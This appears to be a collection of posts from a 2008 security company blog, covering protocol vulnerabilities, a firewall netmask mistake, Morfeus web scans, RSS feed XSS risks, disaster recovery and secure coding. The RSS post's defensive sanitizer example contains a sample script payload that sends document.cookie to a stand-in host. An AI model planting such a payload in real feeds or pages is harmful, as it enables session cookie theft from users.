About Brent Huston

I am the CEO of MicroSolved, Inc. and a security evangelist. I have spent the last 20+ years working to make the Internet safer for everyone on a global scale. I believe the Internet has the capability to contribute to the next great leap for mankind, and I want to help make that happen!

The Protocol Vulnerability Game Continues…

First it was the quaking of the Earth under the weight of the DNS vulnerability that kept us awake at night. Experts predicted the demise of the Internet and cast doomsday shadows over the length of the web. Next came a laser focus on BGP and the potential for more damage to the global infrastructure. Following that came the financial crisis – which looks like it could kill the Internet from attrition when vendor, customer, banking and government dollars simply strangle it to death with a huge gasp!

Likely, we haven’t even seen the end of these other issues when a new evil rears its head. There has been a ton of attention on the emerging “sockstress” vulnerability. According to some sources, this manipulation of TCP state tables will impact every device that can plug into a network and will allow an attacker to cause denial of service outages with small amounts of bandwidth. If this is truly a protocol issue across implementations, as the researchers claim, then the effects could be huge for businesses and consumers alike.

What happens when vulnerabilities are discovered in things that can’t be patched? What happens when everyday devices that depend on networking become vulnerable to trivial exploits without mitigation? These are huge issues that impact everything from blenders to refrigerators to set top cable boxes, modems, routers and other critical systems.

Imagine the costs if your broadband ISP had to replace every modem or router in their client’s homes and businesses. What choice would they have if there were a serious vulnerability that couldn’t be fixed with a remote firmware upgrade? Even if the vulnerability could be minimized by some sort of network filtering, what else would those filters break?

It doesn’t take long to understand the potential gravity of attackers finding holes deep inside accepted and propagated protocols and applications. TCP is likely the most widely used protocol on the planet. A serious hole in it could impact risk in everything from power grid and nuclear control systems to the laundromat dryers that update a Twitter stream when they are free.

How will organizations that depend on huge industrial control systems handle these issues? What would the cost be to update/upgrade the robots that build cars at a factory to mitigate a serious hole? How many consumers would be able or willing to replace the network firewall or wireless router that they bought two years ago with new devices that were immune to a security issue?

Granted, there should always be a risk versus reward equation in use, and the sky is definitely NOT falling today. But, that said, we know researchers and attackers are digging deeper and deeper into the core protocols and applications that our networks depend on. Given that fact, it seems only reasonable to assume that someday we may have to face the idea of a hole being present in anything that plugs into a network – much of which has no mechanism to be patched, upgraded or protected beyond replacement. Beginning to consider this issue today just might give us some epiphanies or breakthroughs between now and the tomorrow that makes this problem real…

Book October 17th Now… E-Voting Issues with TechColumbus

We finally got everything arranged and we got all of the ducks, not just in a row, but quacking nicely together and we are going forward with the TechColumbus presentation on E-Voting. Come out on October 17th and hear about the EVEREST project, attacks against voting systems and the work that the entire EVEREST team has done to make sure that voting is more secure for Ohioans in 2008.

If you have an interest in voting security, elections or application/device security then this should be a must attend!

You can register here and get more information.

HoneyPoint:Network Trust Agent Helps IT Team Identify Serious Network Hole

We got a great story this week from a user of HoneyPoint:Network Trust Agent (NTA). This user touched base with us to let us know how his NTA deployment on his laptop helped his security team identify a critical network hole.

His story started as usual: he had downloaded NTA after one of our conferences and installed it on his laptop. He felt very strongly that it gave him unique insights into how safe he was as he traveled around and used a variety of public wi-fi and other networks. Users often tell us stories of catching various worms and scans with the product as they work from coffee shops, airports and hotels. Sure enough, the logs he sent us also showed the capture of several PHP scans and some other “wormy” activity against his laptop. He added that he has become a strong believer in “when the light turns red, it is time to go”.

But, his logs also showed us something else. He confided that his laptop had “gone red” while he was using his corporate protected network. Since this was unusual, he notified his network administration team. They, in turn, inspected his laptop and pulled his NTA log. Aghast, they found that the log contained evidence that an Internet host had attempted a telnet connection to his box. That should not be possible, since the firewall should be blocking all inbound telnet attempts. After a short discussion, the admin team analyzed the firewall rules and found a misconfiguration problem. Over the previous weekend, one of the administrators had needed to allow a remote vendor to telnet into a network device for some maintenance; however, the admin in question had applied the wrong netmask to the ACL on the firewall. This had inadvertently exposed the entire internal network to telnet probes from the global public Internet!
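As an aside, the gap between an intended single-host rule and a fat-fingered mask is easy to demonstrate. Here is a quick sketch using made-up documentation addresses and Python’s ipaddress module:

```python
import ipaddress

# Intended ACL: permit telnet only from the vendor's single host (/32).
intended = ipaddress.ip_network("203.0.113.45/32")

# Mistyped ACL: an overly broad mask matches far more than one host.
# (A /0 here for dramatic effect - any too-short mask has the same flavor of problem.)
misconfigured = ipaddress.ip_network("203.0.113.45/0", strict=False)

random_internet_host = ipaddress.ip_address("198.51.100.7")

print(random_internet_host in intended)       # False - only the vendor matches
print(random_internet_host in misconfigured)  # True - the whole Internet matches
```

A simple check of how many addresses each rule actually matches is a cheap way to catch this class of error before it ships.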

Obviously, the admin team took immediate action to properly configure the firewall and teach the administrator in question the proper method for ACL creation. They also began to look for other signs of intrusion and to examine the logs of routers, switches and other systems that could have been exposed to compromise from the error. After they had done a careful review and knew that they were OK, they took the time to have the gentleman let us know about their experience and thank us for the helping hand. “That may be the best 10 bucks we ever spent!”, one of the team members exclaimed.

Do you have a good story about how one of the HoneyPoint products has helped you? Have you caught malicious inbound traffic on your laptop at a coffee shop? If so, let us know.

If you are interested in learning more about HoneyPoint:Network Trust Agent, Personal Edition or our critically acclaimed Security Server product for enterprises, please feel free to email us at info<_at_>microsolved.com or give us a call. We would love to talk with you about how honeypot technologies and our products in particular can help you create effective, efficient and affordable security controls throughout your environment!

Morfeus Scanner soapCaller.bs Scans

Our HoneyPoint deployments have been picking up a recently added (August 2008) scan signature from Morfeus, the bot-based web scanner that has been around for a long time. The new scans were first detected on our consumer-grade DSL/cable segments in late August and have now been seen on our corporate environment sensors as well.

The scans check for “soapCaller.bs” and then “/user/soapCaller.bs”. Returning a 200 result code did not bring any additional traffic or attacks from the original source within 96 hours of the initial scans. In fact, returning the 200 did not seem to cause any change in behavior of the scans or any additional attacks from any source. Likely, this means that vulnerable hosts are being cataloged for later mass exploitation.
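For anyone who wants to watch for these probes on their own hosts, here is a minimal sketch of a logging listener built on Python’s standard library. This is purely an illustration of the idea, not how HoneyPoint is implemented:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# The two request paths observed in these Morfeus scans.
MORFEUS_PROBES = {"/soapCaller.bs", "/user/soapCaller.bs"}

class ProbeLogger(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path in MORFEUS_PROBES:
            # Log the probe and answer 200 to see if it changes the bot's behavior.
            print(f"morfeus probe from {self.client_address[0]}: {self.path}")
            self.send_response(200)
        else:
            self.send_response(404)
        self.end_headers()
```

Running it with `HTTPServer(("", 8080), ProbeLogger).serve_forever()` on an otherwise unused host will give you a feel for just how frequent these scans really are.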

Morfeus scans are quite prevalent and can include searches for a number of common PHP and other web application vulnerabilities. Google searches on “morfeus” return about 259,000 results, including quite a few mentions of ongoing scans from the bot-net.

Here is a blog post that discusses using .htaccess rules to block scans with the morfeus user agent.
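For reference, such a rule typically looks something like the following (assuming Apache with mod_rewrite enabled; test before deploying, and keep in mind that user agents are trivial to spoof, so this only stops the lazy scans):

```apache
# Return 403 Forbidden to any client whose User-Agent contains "morfeus"
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} morfeus [NC]
RewriteRule .* - [F,L]
```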

Morfeus has shown itself to be quite adaptive and seems to be updated pretty frequently by the bot-masters with new application attack signatures. The scanning is very widespread and can be observed on a regular basis across platforms and ISP types.

The soapCaller.bs page is a file often associated with the Drupal content management system. A number of vulnerabilities have been identified in this package in the past, including during our recent content manager testing project. Users of Drupal should be vigilant in patching their systems and in performing application assessments.

Blog Layout Plainess and Distributed, Syndicated Threats

Just got a great question about the visual layout of the blog page.

To answer the question RobM asked about why we don’t increase the “flash” of the blog page: the answer comes from marketing guru Seth Godin – we want you to focus on the signal contained in the blog posts, not the “noise” that would enter the equation if we added a bunch of screen gadgets, flair or other eye (and attention) grabbing stuff.

We hope that you read the blog to get information about the state of information security, technology/privacy issues and the other topics we cover here.

So, RobM, that’s the long and short of it. We want your attention to be focused on the quality of the content we deliver and nothing else. If you want to know what the latest weather forecast is, what virus alerts or the like are going on – check out one of the many information security “portals” out there. They are very high on gadgets, heads up displays and all kinds of other stuff. They certainly have their purpose, but they just present too much “noise” to “signal” for the vision of the MSI team.

That said, to keep this blog post more on topic than marketing strategy – have you ever considered the threats that could stem from syndication into things like portals? Imagine the cookie theft that could be performed by a rogue entry in a syndicated RSS feed or other mechanism that got wide distribution. I know this has seen a proof of concept in the past, and I have tested more than a few RSS clients that were vulnerable to embedded XSS attacks.

One scenario that the team has discussed is the injection of XSS or the like inside of corporate feeds on the intranet. This could be a quick, easy way to gain several forms of access to a variety of internal web apps in an enterprise. Would your internal feed mechanisms catch the attack? Would your internal users be exploitable? If your organization has moved forward with embracing RSS feeds and other syndication techniques – this might be something to add to your next assessment.
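A sketch of the defensive half of that assessment item – escaping untrusted feed content before it ever reaches a browser. This is a toy reader built on the standard library; a production client should lean on a vetted HTML sanitizer instead:

```python
import html
import xml.etree.ElementTree as ET

# A toy feed with a hostile entry; the script payload stands in for whatever
# a rogue syndicated item might carry.
FEED = """<rss><channel><item>
<title>Quarterly results</title>
<description>&lt;script&gt;new Image().src='http://evil.example/c?'+document.cookie&lt;/script&gt;</description>
</item></channel></rss>"""

def safe_items(feed_xml):
    """Parse a feed and HTML-escape every field before it reaches a browser."""
    root = ET.fromstring(feed_xml)
    for item in root.iter("item"):
        yield {child.tag: html.escape(child.text or "") for child in item}

for item in safe_items(FEED):
    print(item["description"])  # the script tags arrive escaped, so they render inert
```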

Revision of Twitter Strategy

OK, I spent the last week or so working on my Twitter capability. But, I have to say, after a week, Tim Ferriss’s strategy of not following people really seems to limit the capabilities that Twitter brings to the table in terms of information aggregation, conversation and leveraged crowdsourcing of ideas. So, effective now, I will start to follow key people who add good rapport, valuable information and good conversation.

Again, if you are interested in following me on Twitter, you can find me at http://www.twitter.com/lbhuston

I will continue to tweak out how I use Twitter and see if I can find a good leverage point for the tool. The more I learn, the more I will report back here, in the hopes of eventually being able to build a methodology of sorts….

Thanks again for reading the blog, tolerating the noise and being interested. Blogging and Twittering rank right up there with public speaking in my book. Being able to speak, teach and work with the public is one of the things that truly makes me “The Luckiest Guy In The World”(TM)…..

Google Trends Look at Vulnerabilities

This morning I ran a quick Google Trends look at three types of vulnerabilities: buffer overflows, SQL injections and cross-site scripting (XSS). The results are interesting to me, though certainly no shock.

You can view the graphs and data here.

What we see are spikes of interest in injections while both XSS and buffer overflow searches remain at about the same level as they have for the last year or so. This is, of course, no surprise, given the recent spate of injection compromises, defacements and malware attacks. What is interesting to me is the news graph. I did not think it would be quite so spiky. There are a number of places where mentions in the press of both injections and XSS spike heavily. That is really good news, because it means that the mainstream press is covering those topics to a larger extent. The more mainstream press coverage the issues get, theoretically, the more awareness there should be of the topic.

Also interesting to me is that Indonesia shows up as the largest source for searches on injection and Malaysia is number 7. In XSS, Indonesia shows up at number 7, while Malaysia does not make the list. More than likely, these search results are good indicators of the research and work involved in the “hacking war” between the two countries, a sort of online cyber-conflict that has been taking place for the last few years without much mainstream media attention.

South Korea shows up on all of the lists as a popular source of search activity around the vulns, and some of the other countries on the list that should be drawing interest are Iran, Israel and India. Obviously, some groups in these countries are building some cyber capabilities, as they are searching on enough data to be listed. This brings up some interesting questions.

With detailed analysis over long periods, perhaps this data would be useful for tracking the growth of capabilities in a given locale? Also, from a corporate security stance, is there any way that the data could be used in the short term to provide a focal lens for risk management? How could analysis of short term data be used to “forecast” potential areas of trouble in the near future? Does increased research of a topic area correlate with near future attack increases in that particular vulnerability family?

Further study into gaining intelligence from Google Trends is needed. There just might be a way to tap it for insight into emerging patterns and a deeper understanding of attack type prevalence and other indicators of underground strategic changes. Only time will tell how much power we can wring from this juicy cache of information. In the meantime, play with it a bit and see what interesting stuff you can find.

A Taste of Our Own Medicine…Real Life DR/BC Experience for the Assessors

It has been a turbulent last few days around MSI and in Central Ohio at large. On Sunday, we experienced the leftovers of Hurricane Ike. Being in the Midwest, we were not quite prepared for what came our way. Wide swaths of the state experienced winds as high as those associated with a minor hurricane or tropical storm. Hundreds of thousands were left without power, and damage to homes and property took a heavy toll. While the damage to our area was a minor issue compared to the beating that Houston and parts of Texas took – it was, nevertheless, a major event for us.

Today is 3 full days after the storm event here in Columbus and many remain without power and other “conveniences”. Grocery stores, gas stations and restaurants are just beginning to reopen in many parts of the city. Problems with various services and businesses abound. For example, many schools are still closed, several doctor and dentist offices still have no power and there are ongoing ups and downs for telephone services and ISPs.

Around MSI, we have been fighting the damage from the storm and Mr. Murphy. While we have been among the lucky ones to keep power on a stable basis, many of our team have been spending long hours in the conference room watching TV and playing video games after business hours. Many of them have no electricity at home, so this seems to be an easy way for them to spend some time. Our ISP has had two outages in the last two days. One was around 5 hours, due to a power failure in some of the equipment that manages the “last mile”, while the other was less than an hour this morning, when the generator for their local data center developed an oil leak. Thankfully, both were repaired within the SLA and neither interfered with our progress on engagements.

We have prepped our warm site for extended outages, and just as we were about to activate it for these ISP outages, the connectivity returned. We have learned some lessons over the last couple of days about dealing with email outages and web presence outages, and we certainly gained some deeper insights into a few slight dependencies that had escaped us, even during our twice-yearly DR testing. We still have some kinks to work out, but thankfully, our plans and practice paid off. We were prepared, the team knew our SLA windows for our vendors and our clients, and our processes for ensuring continuation of engagements worked well!

We got to know firsthand exactly how good prep and good processes for DR/BC pay off. We took our own medicine and the taste wasn’t all that bad.

The moral of the story, I guess, is that DR/BC is a very worthwhile process. So the next time we are doing an assessment for you and ask some tough questions about yours, don’t take it personally – as we said, we have learned firsthand just how worthwhile the front-end investment can be.

Learn more about the storm:

News about the storm here.

American Electric Power outage map.

Local news.

PS – Special thanks to the folks who signed up for the State of the Threat presentation this morning. Sorry for the need to postpone it. We worked with Platform Labs throughout the day yesterday attempting to coordinate the event, but at the end of the day yesterday they still had no power. Thus, the postponement. Thanks for your patience and understanding on the issue. The good news is that Steve at Platform says they are back up and running as of this morning! Good news for Steve and everyone else!

“Secure Code” Will Save Us — Right????????

I know we have always preached that application security is much more cost effective when it is baked in. But, the reality of today’s application horizon is that security is an afterthought, at best, for a majority of web applications. A variety of reasons ranging from inexperienced developers to legacy technologies and from apathetic customers to security issues in core technologies have made this so. In fact, in our application security testing services we often encounter applications in production environments that fail to protect against attacks from 10 years ago!

The average development team we work with seems interested in fixing the problems, but often lacks a basic understanding of how common attacks like SQL injection and XSS work. Without a basic understanding of the threats, how on earth can they be expected to protect against them? Recently, we spent more than four hours explaining the whitelist vs. blacklist approaches to a certain development team who shall remain nameless. It took almost a half day of conference calls and email exchanges for them to understand how these basic approaches to filtering user input could be employed to protect their application against input validation attacks. It was not that they were not trying. The problem seemed to be that their application was developed by a small group of intern-level programmers, and the team members with real programming experience (the one(s) who had done the engineering and application design) were long since gone from the company or reassigned to other projects. Without experienced oversight and guidance, the interns had produced working code, for sure, but without any underlying controls, security, availability or reliability!
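The distinction we walked that team through can be shown in a few lines. This sketch uses a hypothetical username field; real validation belongs in a maintained framework, not a hand-rolled filter:

```python
import re

# Blacklist: reject input containing known-bad fragments. Brittle - the
# attacker only needs one pattern the list forgot.
BAD_FRAGMENTS = ["<script", "' or ", "--", ";"]

def blacklist_ok(value):
    lowered = value.lower()
    return not any(bad in lowered for bad in BAD_FRAGMENTS)

# Whitelist: accept only input matching the shape we expect (here, a
# hypothetical username field). Everything else is rejected by default,
# including attacks nobody has thought of yet.
USERNAME_RE = re.compile(r"^[a-z0-9_]{3,20}$")

def whitelist_ok(value):
    return bool(USERNAME_RE.fullmatch(value))

print(blacklist_ok('" OR 1=1 #'))  # True - this injection slips past the blacklist
print(whitelist_ok('" OR 1=1 #'))  # False - rejected, it is not a valid username
```

This is why we push teams toward the whitelist approach wherever the expected input has a definable shape: the blacklist has to anticipate every attack, while the whitelist only has to describe the legitimate data.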

Today, if we look at the marketplace, there are a ton of solutions attempting to bolt on security after the fact. Everything from code scanners to web application firewalls are emerging as controls to help organizations deal with web application security. One of the big problems with these technologies is that they require changes to the underlying source code, logic or web server environments. At the very least, WAFs act as a filtering device at the protocol layer, and many applications simply perform unreliably when a WAF is “protecting them”. What we really need is a reliable way to add security to web applications without changes to protocols, environments or logic.

Of course, the ultimate argument is that what we really need is secure code. I have read a lot of security pundits lately talking about how “secure code” is the solution. “Secure code” has become the latest battle cry, silver bullet, smoke and mirror trick and marketing hype. However, “secure coding” is not easy. It is not immediately available for most organizations – there is no switch to flip on your developers to make them churn out “secure code” – there is no ONE class or seminar you can send them to make them write “secure code”. Instead, it takes ongoing education, updates to existing code tools, frameworks and development environments. It will be a long, slow process. It will be a human process and it will be expensive.

Even then, once we get all of our programmers making “secure code”, there will still be problems. New attack formats will arrive. Legacy applications will still have old issues – some may be rewritten, but it won’t be cost effective for all web applications. New technologies and web enhancements will certainly degrade the security posture of even today’s most hardened web application. In other words – as you have heard me say before – Security is a journey, not a destination. We won’t get all of our code secure. We will never cross the line when all web apps are safe. We will simply move closer to a time when a majority of web applications are secure enough to meet our level of risk tolerance. Even then, that moment is likely fleeting. The center will not hold. The universe breaks down upon itself. Entropy is a true constant in the universe, even the security universe. The center will just not hold……

Want More Random Content and Noise in Your Life?

For those of you who want more random noise and content but just can’t get enough of it on the web, I have decided to take up this “Twitter thing”. 😉

Everyone keeps telling me that I need to do it, so I am trying hard to embrace it.

If you are interested in “following me” you can do so here: http://twitter.com/lbhuston

Two caveats: 1. There is likely to be a random element to the content and frequency of the feed. 2. There is likely to be a mix of personal stuff, marketing, security thought, musings, rants, etc. The twitter-sphere seems to encourage this mixture of transparency and actual deep work thought.

Lastly, I have decided to follow only two people thus far: Guy Kawasaki and Timothy Ferriss – two of my favorite authors. So far, keeping up with the tweets from those two, attempting to add my own content and doing the day to day work of leading MSI seems to be consuming all of the cycles I have. So, if you don’t see me following you, please excuse me ahead of time and don’t take it personally…

OK that’s about it for this post. If the last thing you would want in your life is more Brent Huston, don’t feel bad or anything. Believe me, I understand. 🙂

BTW – If you want to check out books by those two authors, they are both excellent. Their books have helped me build MSI and have even helped me gain some level of illusion of control over my personal life.